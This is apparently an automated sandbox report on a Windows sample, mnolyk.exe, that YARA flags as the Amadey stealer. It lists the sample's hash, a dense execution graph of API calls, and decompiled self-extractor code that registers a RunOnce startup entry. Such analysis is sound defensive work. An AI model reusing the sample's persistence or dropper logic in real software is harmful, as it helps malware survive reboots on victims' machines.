                                                                      Commandline:C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Imagebase:0x70000
                                                                      File size:241664 bytes
                                                                      MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000021.00000002.667787109.0000000000071000.00000020.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000021.00000000.667491618.0000000000071000.00000020.00000001.01000000.0000000B.sdmp, Author: Joe Security


                                                                        Execution Graph

                                                                        Execution Coverage:27.2%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:30.9%
                                                                        Total number of Nodes:968
                                                                        Total number of Limit Nodes:43
a33013 2644->2646 2647 a3625f 2645->2647 2646->2287 2646->2298 2647->2642 2650 a33b2d 2648->2650 2649 a33b72 2852 a34fe0 2649->2852 2650->2649 2651 a33b53 2650->2651 2653 a36517 24 API calls 2651->2653 2654 a33b70 2653->2654 2655 a36298 10 API calls 2654->2655 2656 a33b7b 2654->2656 2655->2656 2656->2304 2658 a32583 2657->2658 2659 a32622 2657->2659 2661 a3258b 2658->2661 2662 a325e8 RegOpenKeyExA 2658->2662 2906 a324e0 GetWindowsDirectoryA 2659->2906 2663 a325e3 2661->2663 2665 a3259b RegOpenKeyExA 2661->2665 2662->2663 2664 a32609 RegQueryInfoKeyA 2662->2664 2663->2309 2666 a325d1 RegCloseKey 2664->2666 2665->2663 2667 a325bc RegQueryValueExA 2665->2667 2666->2663 2667->2666 2669 a33bdb 2668->2669 2685 a33bec 2668->2685 2670 a3468f 7 API calls 2669->2670 2670->2685 2671 a33c03 memset 2671->2685 2672 a3468f 7 API calls 2672->2685 2673 a33d13 2674 a344b9 20 API calls 2673->2674 2675 a33d26 2674->2675 2677 a33f4d 2675->2677 2678 a36ce0 4 API calls 2677->2678 2679 a33f60 2678->2679 2679->2311 2680 a33d7b CompareStringA 2681 a33fd7 2680->2681 2680->2685 2681->2677 3004 a32267 2681->3004 2684 a33fab 2686 a344b9 20 API calls 2684->2686 2685->2671 2685->2672 2685->2673 2685->2677 2685->2680 2685->2681 2685->2684 2687 a33f46 LocalFree 2685->2687 2688 a33f1e LocalFree 2685->2688 2692 a33cc7 CompareStringA 2685->2692 2702 a33e10 2685->2702 2914 a31ae8 2685->2914 2954 a3202a memset memset RegCreateKeyExA 2685->2954 2980 a33fef 2685->2980 2690 a33fbe LocalFree 2686->2690 2687->2677 2688->2681 2688->2685 2690->2677 2692->2685 2693 a33f92 2696 a344b9 20 API calls 2693->2696 2694 a33e1f GetProcAddress 2695 a33f64 2694->2695 2694->2702 2697 a344b9 20 API calls 2695->2697 2698 a33fa9 2696->2698 2699 a33f75 FreeLibrary 2697->2699 2700 a33f7c LocalFree 2698->2700 2699->2700 2701 a36285 GetLastError 2700->2701 2701->2675 2702->2693 2702->2694 2703 a33f40 FreeLibrary 2702->2703 2704 a33eff FreeLibrary 2702->2704 2994 a36495 2702->2994 2703->2687 2704->2688 2706 a3468f 7 API calls 
2705->2706 2707 a33a55 LocalAlloc 2706->2707 2708 a33a8e 2707->2708 2709 a33a6c 2707->2709 2710 a3468f 7 API calls 2708->2710 2711 a344b9 20 API calls 2709->2711 2712 a33a98 2710->2712 2713 a33a7d 2711->2713 2714 a33ac5 lstrcmpA 2712->2714 2715 a33a9c 2712->2715 2716 a36285 GetLastError 2713->2716 2718 a33ada 2714->2718 2719 a33b0d LocalFree 2714->2719 2717 a344b9 20 API calls 2715->2717 2720 a32f64 2716->2720 2721 a33aad LocalFree 2717->2721 2722 a36517 24 API calls 2718->2722 2719->2720 2720->2279 2720->2287 2721->2720 2723 a33aec LocalFree 2722->2723 2723->2720 2725 a3303c 2724->2725 2725->2287 2727 a3468f 7 API calls 2726->2727 2728 a3417d LocalAlloc 2727->2728 2729 a34195 2728->2729 2730 a341a8 2728->2730 2731 a344b9 20 API calls 2729->2731 2732 a3468f 7 API calls 2730->2732 2733 a341a6 2731->2733 2734 a341b5 2732->2734 2733->2287 2735 a341c5 lstrcmpA 2734->2735 2736 a341b9 2734->2736 2735->2736 2737 a341e6 LocalFree 2735->2737 2738 a344b9 20 API calls 2736->2738 2737->2733 2738->2737 2740 a3171e _vsnprintf 2739->2740 2741 a362c9 FindResourceA 2740->2741 2743 a36353 2741->2743 2744 a362cb LoadResource LockResource 2741->2744 2745 a36ce0 4 API calls 2743->2745 2744->2743 2747 a362e0 2744->2747 2746 a351ca 2745->2746 2746->2583 2746->2584 2748 a36355 FreeResource 2747->2748 2749 a3631b FreeResource 2747->2749 2748->2743 2750 a3171e _vsnprintf 2749->2750 2750->2741 2752 a3548a 2751->2752 2753 a3551a 2751->2753 2812 a353a1 2752->2812 2823 a358c8 2753->2823 2755 a35495 2757 a35581 2755->2757 2762 a354c2 GetSystemInfo 2755->2762 2763 a3550c 2755->2763 2759 a36ce0 4 API calls 2757->2759 2764 a3559a 2759->2764 2760 a3553b CreateDirectoryA 2765 a35577 2760->2765 2766 a35547 2760->2766 2761 a3554d 2761->2757 2769 a3597d 34 API calls 2761->2769 2774 a354da 2762->2774 2767 a3658a CharPrevA 2763->2767 2764->2625 2775 a32630 GetWindowsDirectoryA 2764->2775 2768 a36285 GetLastError 2765->2768 2766->2761 2767->2753 2770 a3557c 2768->2770 2771 a3555c 2769->2771 2770->2757 
2771->2757 2773 a35568 RemoveDirectoryA 2771->2773 2772 a3658a CharPrevA 2772->2763 2773->2757 2774->2763 2774->2772 2776 a3266f 2775->2776 2777 a3265e 2775->2777 2778 a36ce0 4 API calls 2776->2778 2779 a344b9 20 API calls 2777->2779 2780 a32687 2778->2780 2779->2776 2780->2611 2780->2626 2782 a369a1 2781->2782 2783 a3696e GetDiskFreeSpaceA 2781->2783 2782->2635 2783->2782 2784 a36989 MulDiv 2783->2784 2784->2782 2786 a359bb 2785->2786 2787 a359dd GetDiskFreeSpaceA 2785->2787 2788 a344b9 20 API calls 2786->2788 2789 a35ba1 memset 2787->2789 2790 a35a21 MulDiv 2787->2790 2791 a359cc 2788->2791 2792 a36285 GetLastError 2789->2792 2790->2789 2793 a35a50 GetVolumeInformationA 2790->2793 2794 a36285 GetLastError 2791->2794 2795 a35bbc GetLastError FormatMessageA 2792->2795 2796 a35ab5 SetCurrentDirectoryA 2793->2796 2797 a35a6e memset 2793->2797 2809 a359d1 2794->2809 2798 a35be3 2795->2798 2806 a35acc 2796->2806 2799 a36285 GetLastError 2797->2799 2800 a344b9 20 API calls 2798->2800 2801 a35a89 GetLastError FormatMessageA 2799->2801 2803 a35bf5 SetCurrentDirectoryA 2800->2803 2801->2798 2802 a36ce0 4 API calls 2805 a35c11 2802->2805 2804 a35b94 2803->2804 2804->2802 2805->2611 2807 a35b0a 2806->2807 2810 a35b20 2806->2810 2808 a344b9 20 API calls 2807->2808 2808->2809 2809->2804 2810->2804 2835 a3268b 2810->2835 2814 a353bf 2812->2814 2813 a3171e _vsnprintf 2813->2814 2814->2813 2815 a3658a CharPrevA 2814->2815 2818 a35415 GetTempFileNameA 2814->2818 2816 a353fa RemoveDirectoryA GetFileAttributesA 2815->2816 2816->2814 2817 a3544f CreateDirectoryA 2816->2817 2817->2818 2819 a3543a 2817->2819 2818->2819 2820 a35429 DeleteFileA CreateDirectoryA 2818->2820 2821 a36ce0 4 API calls 2819->2821 2820->2819 2822 a35449 2821->2822 2822->2755 2824 a358d8 2823->2824 2824->2824 2825 a358df LocalAlloc 2824->2825 2826 a358f3 2825->2826 2828 a35919 2825->2828 2827 a344b9 20 API calls 2826->2827 2829 a35906 2827->2829 2831 a3658a CharPrevA 2828->2831 2830 a36285 GetLastError 2829->2830 
2832 a35534 2829->2832 2830->2832 2833 a35931 CreateFileA LocalFree 2831->2833 2832->2760 2832->2761 2833->2829 2834 a3595b CloseHandle GetFileAttributesA 2833->2834 2834->2829 2836 a326e5 2835->2836 2837 a326b9 2835->2837 2838 a326ea 2836->2838 2839 a3271f 2836->2839 2840 a3171e _vsnprintf 2837->2840 2842 a3171e _vsnprintf 2838->2842 2843 a326e3 2839->2843 2847 a3171e _vsnprintf 2839->2847 2841 a326cc 2840->2841 2844 a344b9 20 API calls 2841->2844 2846 a326fd 2842->2846 2845 a36ce0 4 API calls 2843->2845 2844->2843 2848 a3276d 2845->2848 2849 a344b9 20 API calls 2846->2849 2850 a32735 2847->2850 2848->2804 2849->2843 2851 a344b9 20 API calls 2850->2851 2851->2843 2853 a3468f 7 API calls 2852->2853 2854 a34ff5 FindResourceA LoadResource LockResource 2853->2854 2855 a35020 2854->2855 2871 a3515f 2854->2871 2856 a35057 2855->2856 2857 a35029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2855->2857 2874 a34efd 2856->2874 2857->2856 2860 a35060 2862 a344b9 20 API calls 2860->2862 2861 a3507c 2864 a350e8 2861->2864 2868 a35106 2861->2868 2863 a35075 2862->2863 2863->2868 2865 a344b9 20 API calls 2864->2865 2865->2863 2866 a35110 FreeResource 2867 a3511d 2866->2867 2869 a35129 2867->2869 2870 a3513a 2867->2870 2868->2866 2868->2867 2872 a344b9 20 API calls 2869->2872 2870->2871 2873 a3514c SendMessageA 2870->2873 2871->2654 2872->2870 2873->2871 2875 a34f4a 2874->2875 2876 a34fa1 2875->2876 2882 a34980 2875->2882 2878 a36ce0 4 API calls 2876->2878 2879 a34fc6 2878->2879 2879->2860 2879->2861 2883 a34990 2882->2883 2884 a349c2 lstrcmpA 2883->2884 2885 a349a5 2883->2885 2887 a349ba 2884->2887 2888 a34a0e 2884->2888 2886 a344b9 20 API calls 2885->2886 2886->2887 2887->2876 2890 a34b60 2887->2890 2888->2887 2893 a3487a 2888->2893 2891 a34b92 FindCloseChangeNotification 2890->2891 2892 a34b76 2890->2892 2891->2892 2892->2876 2894 a348a2 CreateFileA 2893->2894 2896 a348e9 2894->2896 2897 a34908 2894->2897 2896->2897 2898 a348ee 2896->2898 2897->2887 2901 a3490c 2898->2901 2902 
a348f5 CreateFileA 2901->2902 2903 a34917 2901->2903 2902->2897 2903->2902 2904 a34962 CharNextA 2903->2904 2905 a34953 CreateDirectoryA 2903->2905 2904->2903 2905->2904 2907 a32510 2906->2907 2908 a3255b 2906->2908 2909 a3658a CharPrevA 2907->2909 2910 a36ce0 4 API calls 2908->2910 2911 a32522 WritePrivateProfileStringA _lopen 2909->2911 2912 a32569 2910->2912 2911->2908 2913 a32548 _llseek _lclose 2911->2913 2912->2663 2913->2908 2915 a31b25 2914->2915 3018 a31a84 2915->3018 2917 a31b57 2918 a3658a CharPrevA 2917->2918 2920 a31b8c 2917->2920 2918->2920 2919 a366c8 2 API calls 2921 a31bd1 2919->2921 2920->2919 2922 a31d73 2921->2922 2923 a31bd9 CompareStringA 2921->2923 2925 a366c8 2 API calls 2922->2925 2923->2922 2924 a31bf7 GetFileAttributesA 2923->2924 2926 a31d53 2924->2926 2927 a31c0d 2924->2927 2928 a31d7d 2925->2928 2931 a344b9 20 API calls 2926->2931 2927->2926 2933 a31a84 2 API calls 2927->2933 2929 a31d81 CompareStringA 2928->2929 2930 a31df8 LocalAlloc 2928->2930 2929->2930 2939 a31d9b 2929->2939 2930->2926 2932 a31e0b GetFileAttributesA 2930->2932 2951 a31cc2 2931->2951 2934 a31e1d 2932->2934 2952 a31e45 2932->2952 2935 a31c31 2933->2935 2934->2952 2937 a31c50 LocalAlloc 2935->2937 2944 a31a84 2 API calls 2935->2944 2936 a31e89 2938 a36ce0 4 API calls 2936->2938 2937->2926 2940 a31c67 GetPrivateProfileIntA GetPrivateProfileStringA 2937->2940 2943 a31ea1 2938->2943 2939->2939 2945 a31dbe LocalAlloc 2939->2945 2946 a31cf8 2940->2946 2940->2951 2943->2685 2944->2937 2945->2926 2947 a31de1 2945->2947 2949 a31d23 2946->2949 2950 a31d09 GetShortPathNameA 2946->2950 2948 a3171e _vsnprintf 2947->2948 2948->2951 2953 a3171e _vsnprintf 2949->2953 2950->2949 2951->2936 3024 a32aac 2952->3024 2953->2951 2955 a32256 2954->2955 2956 a3209a 2954->2956 2957 a36ce0 4 API calls 2955->2957 2959 a3171e _vsnprintf 2956->2959 2961 a320dc 2956->2961 2958 a32263 2957->2958 2958->2685 2960 a320af RegQueryValueExA 2959->2960 2960->2956 2960->2961 2962 a320e4 RegCloseKey 
2961->2962 2963 a320fb GetSystemDirectoryA 2961->2963 2962->2955 2964 a3658a CharPrevA 2963->2964 2965 a3211b LoadLibraryA 2964->2965 2966 a32179 GetModuleFileNameA 2965->2966 2967 a3212e GetProcAddress FreeLibrary 2965->2967 2969 a321de RegCloseKey 2966->2969 2971 a32177 2966->2971 2967->2966 2968 a3214e GetSystemDirectoryA 2967->2968 2970 a32165 2968->2970 2968->2971 2969->2955 2972 a3658a CharPrevA 2970->2972 2971->2971 2973 a321b7 LocalAlloc 2971->2973 2972->2971 2974 a321cd 2973->2974 2975 a321ec 2973->2975 2976 a344b9 20 API calls 2974->2976 2977 a3171e _vsnprintf 2975->2977 2976->2969 2978 a32218 RegSetValueExA RegCloseKey LocalFree 2977->2978 2978->2955 2981 a34016 CreateProcessA 2980->2981 2993 a34106 2980->2993 2982 a34041 WaitForSingleObject GetExitCodeProcess 2981->2982 2983 a340c4 2981->2983 2986 a34070 2982->2986 2985 a36285 GetLastError 2983->2985 2984 a36ce0 4 API calls 2987 a34117 2984->2987 2988 a340c9 GetLastError FormatMessageA 2985->2988 3051 a3411b 2986->3051 2987->2685 2990 a344b9 20 API calls 2988->2990 2990->2993 2991 a34096 CloseHandle CloseHandle 2992 a340ba 2991->2992 2991->2993 2992->2993 2993->2984 2995 a364c2 2994->2995 2996 a3658a CharPrevA 2995->2996 2997 a364d8 GetFileAttributesA 2996->2997 2998 a36501 LoadLibraryA 2997->2998 2999 a364ea 2997->2999 3001 a36508 2998->3001 2999->2998 3000 a364ee LoadLibraryExA 2999->3000 3000->3001 3002 a36ce0 4 API calls 3001->3002 3003 a36513 3002->3003 3003->2702 3005 a32381 3004->3005 3006 a32289 RegOpenKeyExA 3004->3006 3007 a36ce0 4 API calls 3005->3007 3006->3005 3008 a322b1 RegQueryValueExA 3006->3008 3009 a3238c 3007->3009 3010 a322e6 memset GetSystemDirectoryA 3008->3010 3011 a32374 RegCloseKey 3008->3011 3009->2677 3012 a32321 3010->3012 3013 a3230f 3010->3013 3011->3005 3014 a3171e _vsnprintf 3012->3014 3015 a3658a CharPrevA 3013->3015 3016 a3233f RegSetValueExA 3014->3016 3015->3012 3016->3011 3022 a31a9a 3018->3022 3020 a31aaf 3021 a31aba 3020->3021 3023 a3667f 2 API calls 3020->3023 
3021->2917 3022->3020 3022->3021 3037 a3667f 3022->3037 3023->3020 3025 a32ad4 GetModuleFileNameA 3024->3025 3029 a32be6 3024->3029 3036 a32b02 3025->3036 3026 a36ce0 4 API calls 3027 a32bf5 3026->3027 3027->2936 3028 a32af1 IsDBCSLeadByte 3028->3036 3029->3026 3030 a32b11 CharNextA CharUpperA 3032 a32b8d CharUpperA 3030->3032 3030->3036 3031 a32bca CharNextA 3033 a32bd3 CharNextA 3031->3033 3032->3036 3033->3036 3035 a32b43 CharPrevA 3035->3036 3036->3028 3036->3029 3036->3030 3036->3031 3036->3033 3036->3035 3042 a365e8 3036->3042 3038 a36689 3037->3038 3039 a366a5 3038->3039 3040 a36648 IsDBCSLeadByte 3038->3040 3041 a36697 CharNextA 3038->3041 3039->3022 3040->3038 3041->3038 3043 a365f4 3042->3043 3043->3043 3044 a365fb CharPrevA 3043->3044 3045 a36611 CharPrevA 3044->3045 3046 a3660b 3045->3046 3047 a3661e 3045->3047 3046->3045 3046->3047 3048 a3663d 3047->3048 3049 a36627 CharPrevA 3047->3049 3050 a36634 CharNextA 3047->3050 3048->3036 3049->3048 3049->3050 3050->3048 3052 a34132 3051->3052 3054 a3412a 3051->3054 3055 a31ea7 3052->3055 3054->2991 3056 a31eba 3055->3056 3057 a31ed3 3055->3057 3058 a3256d 15 API calls 3056->3058 3057->3054 3058->3057 3060 a31ff0 RegOpenKeyExA 3059->3060 3061 a32026 3059->3061 3060->3061 3062 a3200f RegDeleteValueA RegCloseKey 3060->3062 3061->2319 3062->3061 3127 a319e0 3128 a31a24 GetDesktopWindow 3127->3128 3130 a31a03 3127->3130 3136 a343d0 6 API calls 3128->3136 3129 a31a20 3134 a36ce0 4 API calls 3129->3134 3130->3129 3132 a31a16 EndDialog 3130->3132 3132->3129 3135 a31a7e 3134->3135 3137 a34463 SetWindowPos 3136->3137 3139 a36ce0 4 API calls 3137->3139 3140 a31a33 LoadStringA SetDlgItemTextA MessageBeep 3139->3140 3140->3129 3141 a36a20 __getmainargs 3142 a36bef _XcptFilter 3143 a369b0 3144 a369b5 3143->3144 3152 a36fbe GetModuleHandleW 3144->3152 3146 a369c1 __set_app_type __p__fmode __p__commode 3147 a369f9 3146->3147 3148 a36a02 __setusermatherr 3147->3148 3149 a36a0e 3147->3149 3148->3149 3154 a371ef _controlfp 
3149->3154 3151 a36a13 3153 a36fcf 3152->3153 3153->3146 3154->3151 3155 a334f0 3156 a33504 3155->3156 3174 a335b8 3155->3174 3158 a3351b 3156->3158 3159 a335be GetDesktopWindow 3156->3159 3156->3174 3157 a33526 3160 a3354f 3158->3160 3161 a3351f 3158->3161 3163 a343d0 11 API calls 3159->3163 3160->3157 3165 a33559 ResetEvent 3160->3165 3161->3157 3164 a3352d TerminateThread EndDialog 3161->3164 3162 a33671 EndDialog 3162->3157 3166 a335d6 3163->3166 3164->3157 3167 a344b9 20 API calls 3165->3167 3168 a335e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3166->3168 3169 a3361d SetWindowTextA CreateThread 3166->3169 3171 a33581 3167->3171 3168->3169 3169->3157 3170 a33646 3169->3170 3172 a344b9 20 API calls 3170->3172 3173 a3359b SetEvent 3171->3173 3175 a3358a SetEvent 3171->3175 3172->3174 3176 a33680 4 API calls 3173->3176 3174->3157 3174->3162 3175->3157 3176->3174 3177 a36ef0 3178 a36f2d 3177->3178 3180 a36f02 3177->3180 3179 a36f27 ?terminate@ 3179->3178 3180->3178 3180->3179 3181 a37270 _except_handler4_common 3182 a36c03 3183 a36c17 _exit 3182->3183 3184 a36c1e 3182->3184 3183->3184 3185 a36c27 _cexit 3184->3185 3186 a36c32 3184->3186 3185->3186 3063 a34cc0 GlobalFree 3064 a36f40 SetUnhandledExceptionFilter 3187 a34bc0 3188 a34bd7 3187->3188 3190 a34c05 3187->3190 3189 a34c1b SetFilePointer 3189->3188 3190->3188 3190->3189 3191 a330c0 3192 a330de CallWindowProcA 3191->3192 3193 a330ce 3191->3193 3194 a330da 3192->3194 3193->3192 3193->3194 3195 a363c0 3196 a36407 3195->3196 3197 a3658a CharPrevA 3196->3197 3198 a36415 CreateFileA 3197->3198 3199 a3643a 3198->3199 3200 a36448 WriteFile 3198->3200 3202 a36ce0 4 API calls 3199->3202 3201 a36465 CloseHandle 3200->3201 3201->3199 3204 a3648f 3202->3204 3205 a33100 3206 a33111 3205->3206 3207 a331b0 3205->3207 3209 a3311d 3206->3209 3211 a33149 GetDesktopWindow 3206->3211 3208 a331b9 SendDlgItemMessageA 3207->3208 3210 a33141 3207->3210 3208->3210 3209->3210 3212 a33138 EndDialog 3209->3212 3213 a343d0 11 API 
calls 3211->3213 3212->3210 3214 a3315d 6 API calls 3213->3214 3214->3210 3215 a34200 3216 a3420b SendMessageA 3215->3216 3217 a3421e 3215->3217 3216->3217 3065 a34cd0 3066 a34cf4 3065->3066 3067 a34d0b 3065->3067 3068 a34b60 FindCloseChangeNotification 3066->3068 3085 a34d02 3066->3085 3070 a34dcb 3067->3070 3073 a34d25 3067->3073 3067->3085 3068->3085 3069 a36ce0 4 API calls 3072 a34e95 3069->3072 3071 a34dd4 SetDlgItemTextA 3070->3071 3074 a34de3 3070->3074 3071->3074 3073->3085 3086 a34c37 3073->3086 3074->3085 3091 a3476d 3074->3091 3077 a34e38 3079 a34980 25 API calls 3077->3079 3077->3085 3081 a34e56 3079->3081 3080 a34b60 FindCloseChangeNotification 3082 a34d99 SetFileAttributesA 3080->3082 3081->3085 3100 a347e0 LocalAlloc 3081->3100 3082->3085 3085->3069 3087 a34c4c DosDateTimeToFileTime 3086->3087 3090 a34c88 3086->3090 3088 a34c5e LocalFileTimeToFileTime 3087->3088 3087->3090 3089 a34c70 SetFileTime 3088->3089 3088->3090 3089->3090 3090->3080 3090->3085 3110 a366ae GetFileAttributesA 3091->3110 3093 a3477b 3093->3077 3094 a347cc SetFileAttributesA 3096 a347db 3094->3096 3096->3077 3097 a36517 24 API calls 3098 a347b1 3097->3098 3098->3094 3098->3096 3099 a347c2 3098->3099 3099->3094 3101 a347f6 3100->3101 3102 a3480f LocalAlloc 3100->3102 3103 a344b9 20 API calls 3101->3103 3106 a34831 3102->3106 3109 a3484f 3102->3109 3104 a3480b 3103->3104 3104->3085 3107 a344b9 20 API calls 3106->3107 3108 a34846 LocalFree 3107->3108 3108->3104 3109->3104 3111 a34777 3110->3111 3111->3093 3111->3094 3111->3097 3112 a34ad0 3120 a33680 3112->3120 3115 a34ae9 3116 a34aee WriteFile 3117 a34b0f 3116->3117 3118 a34b14 3116->3118 3118->3117 3119 a34b3b SendDlgItemMessageA 3118->3119 3119->3117 3121 a33691 MsgWaitForMultipleObjects 3120->3121 3122 a336a9 PeekMessageA 3121->3122 3123 a336e8 3121->3123 3122->3121 3124 a336bc 3122->3124 3123->3115 3123->3116 3124->3121 3124->3123 3125 a336c7 DispatchMessageA 3124->3125 3126 a336d1 PeekMessageA 3124->3126 3125->3126 3126->3124 
3218 a33210 3219 a33227 3218->3219 3243 a3328e EndDialog 3218->3243 3220 a333e2 GetDesktopWindow 3219->3220 3221 a33235 3219->3221 3223 a343d0 11 API calls 3220->3223 3224 a33239 3221->3224 3226 a332dd GetDlgItemTextA 3221->3226 3227 a3324c 3221->3227 3225 a333f1 SetWindowTextA SendDlgItemMessageA 3223->3225 3225->3224 3228 a3341f GetDlgItem EnableWindow 3225->3228 3233 a332fc 3226->3233 3250 a33366 3226->3250 3229 a33251 3227->3229 3230 a332c5 EndDialog 3227->3230 3228->3224 3229->3224 3231 a3325c LoadStringA 3229->3231 3230->3224 3234 a33294 3231->3234 3235 a3327b 3231->3235 3232 a344b9 20 API calls 3232->3224 3238 a33331 GetFileAttributesA 3233->3238 3233->3250 3256 a34224 LoadLibraryA 3234->3256 3239 a344b9 20 API calls 3235->3239 3241 a3333f 3238->3241 3242 a3337c 3238->3242 3239->3243 3240 a332a5 SetDlgItemTextA 3240->3224 3240->3235 3245 a344b9 20 API calls 3241->3245 3244 a3658a CharPrevA 3242->3244 3243->3224 3246 a3338d 3244->3246 3247 a33351 3245->3247 3248 a358c8 27 API calls 3246->3248 3247->3224 3249 a3335a CreateDirectoryA 3247->3249 3251 a33394 3248->3251 3249->3242 3249->3250 3250->3232 3251->3250 3252 a333a4 3251->3252 3253 a333c7 EndDialog 3252->3253 3254 a3597d 34 API calls 3252->3254 3253->3224 3255 a333c3 3254->3255 3255->3224 3255->3253 3257 a343b2 3256->3257 3258 a34246 GetProcAddress 3256->3258 3262 a344b9 20 API calls 3257->3262 3259 a343a4 FreeLibrary 3258->3259 3260 a3425d GetProcAddress 3258->3260 3259->3257 3260->3259 3261 a34274 GetProcAddress 3260->3261 3261->3259 3263 a3428b 3261->3263 3264 a3329d 3262->3264 3265 a34295 GetTempPathA 3263->3265 3270 a342e1 3263->3270 3264->3224 3264->3240 3266 a342ad 3265->3266 3266->3266 3267 a342b4 CharPrevA 3266->3267 3268 a342d0 CharPrevA 3267->3268 3267->3270 3268->3270 3269 a34390 FreeLibrary 3269->3264 3270->3269 3271 a34a50 3272 a34a66 3271->3272 3273 a34a9f ReadFile 3271->3273 3274 a34a82 memcpy 3272->3274 3275 a34abb 3272->3275 3273->3275 3274->3275 3276 a33450 3277 a334d3 EndDialog 
3276->3277 3278 a3345e 3276->3278 3279 a3346a 3277->3279 3280 a3349a GetDesktopWindow 3278->3280 3284 a33465 3278->3284 3281 a343d0 11 API calls 3280->3281 3282 a334ac SetWindowTextA SetDlgItemTextA SetForegroundWindow 3281->3282 3282->3279 3283 a3348c EndDialog 3283->3279 3284->3279 3284->3283

Callgraph

Legend: Executed; Not Executed; Opacity -> Relevance; Disassembly available

                                                                        Control-flow Graph

                                                                        C-Code - Quality: 93%
                                                                        			E00A3202A(struct HINSTANCE__* __edx) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				char _v528;
                                                                        				void* _v532;
                                                                        				int _v536;
                                                                        				int _v540;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t28;
                                                                        				long _t36;
                                                                        				long _t41;
                                                                        				struct HINSTANCE__* _t46;
                                                                        				intOrPtr _t49;
                                                                        				intOrPtr _t50;
                                                                        				CHAR* _t54;
                                                                        				void _t56;
                                                                        				signed int _t66;
                                                                        				intOrPtr* _t72;
                                                                        				void* _t73;
                                                                        				void* _t75;
                                                                        				void* _t80;
                                                                        				intOrPtr* _t81;
                                                                        				void* _t86;
                                                                        				void* _t87;
                                                                        				void* _t90;
                                                                        				_Unknown_base(*)()* _t91;
                                                                        				signed int _t93;
                                                                        				void* _t94;
                                                                        				void* _t95;
                                                                        
                                                                        				_t79 = __edx;
                                                                        				_t28 =  *0xa38004; // 0xb6b6972c
                                                                        				_v8 = _t28 ^ _t93;
                                                                        				_t84 = 0x104;
                                                                        				memset( &_v268, 0, 0x104);
                                                                        				memset( &_v528, 0, 0x104);
                                                                        				_t95 = _t94 + 0x18;
                                                                        				_t66 = 0;
                                                                        				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                                        				if(_t36 != 0) {
                                                                        					L24:
                                                                        					return E00A36CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                                        				}
                                                                        				_push(_t86);
                                                                        				_t87 = 0;
                                                                        				while(1) {
                                                                        					E00A3171E("wextract_cleanup0", 0x50, "wextract_cleanup%d", _t87);
                                                                        					_t95 = _t95 + 0x10;
                                                                        					_t41 = RegQueryValueExA(_v532, "wextract_cleanup0", 0, 0, 0,  &_v540); // executed
                                                                        					if(_t41 != 0) {
                                                                        						break;
                                                                        					}
                                                                        					_t87 = _t87 + 1;
                                                                        					if(_t87 < 0xc8) {
                                                                        						continue;
                                                                        					}
                                                                        					break;
                                                                        				}
                                                                        				if(_t87 != 0xc8) {
                                                                        					GetSystemDirectoryA( &_v528, _t84);
                                                                        					_t79 = _t84;
                                                                        					E00A3658A( &_v528, _t84, "advpack.dll");
                                                                        					_t46 = LoadLibraryA( &_v528); // executed
                                                                        					_t84 = _t46;
                                                                        					if(_t84 == 0) {
                                                                        						L10:
                                                                        						if(GetModuleFileNameA( *0xa39a3c,  &_v268, 0x104) == 0) {
                                                                        							L17:
                                                                        							_t36 = RegCloseKey(_v532);
                                                                        							L23:
                                                                        							_pop(_t86);
                                                                        							goto L24;
                                                                        						}
                                                                        						L11:
                                                                        						_t72 =  &_v268;
                                                                        						_t80 = _t72 + 1;
                                                                        						do {
                                                                        							_t49 =  *_t72;
                                                                        							_t72 = _t72 + 1;
                                                                        						} while (_t49 != 0);
                                                                        						_t73 = _t72 - _t80;
                                                                        						_t81 = 0xa391e4;
                                                                        						do {
                                                                        							_t50 =  *_t81;
                                                                        							_t81 = _t81 + 1;
                                                                        						} while (_t50 != 0);
                                                                        						_t84 = _t73 + 0x50 + _t81 - 0xa391e5;
                                                                        						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0xa391e5);
                                                                        						if(_t90 != 0) {
                                                                        							 *0xa38580 = _t66 ^ 0x00000001;
                                                                        							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                                        							if(_t66 == 0) {
                                                                        								_t54 = "%s /D:%s";
                                                                        							}
                                                                        							_push("C:\Users\FRONTD~1\AppData\Local\Temp\IXP000.TMP\");
                                                                        							E00A3171E(_t90, _t84, _t54,  &_v268);
                                                                        							_t75 = _t90;
                                                                        							_t23 = _t75 + 1; // 0x1
                                                                        							_t79 = _t23;
                                                                        							do {
                                                                        								_t56 =  *_t75;
                                                                        								_t75 = _t75 + 1;
                                                                        							} while (_t56 != 0);
                                                                        							_t24 = _t75 - _t79 + 1; // 0x2
                                                                        							RegSetValueExA(_v532, "wextract_cleanup0", 0, 1, _t90, _t24); // executed
                                                                        							RegCloseKey(_v532); // executed
                                                                        							_t36 = LocalFree(_t90);
                                                                        							goto L23;
                                                                        						}
                                                                        						_t79 = 0x4b5;
                                                                        						E00A344B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                                        						goto L17;
                                                                        					}
                                                                        					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                                        					_t66 = 0 | _t91 != 0x00000000;
                                                                        					FreeLibrary(_t84); // executed
                                                                        					if(_t91 == 0) {
                                                                        						goto L10;
                                                                        					}
                                                                        					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                        						E00A3658A( &_v268, 0x104, 0xa31140);
                                                                        					}
                                                                        					goto L11;
                                                                        				}
                                                                        				_t36 = RegCloseKey(_v532);
                                                                        				 *0xa38530 = _t66;
                                                                        				goto L23;
                                                                        			}


                                                                        APIs
                                                                        • memset.MSVCRT ref: 00A32050
                                                                        • memset.MSVCRT ref: 00A3205F
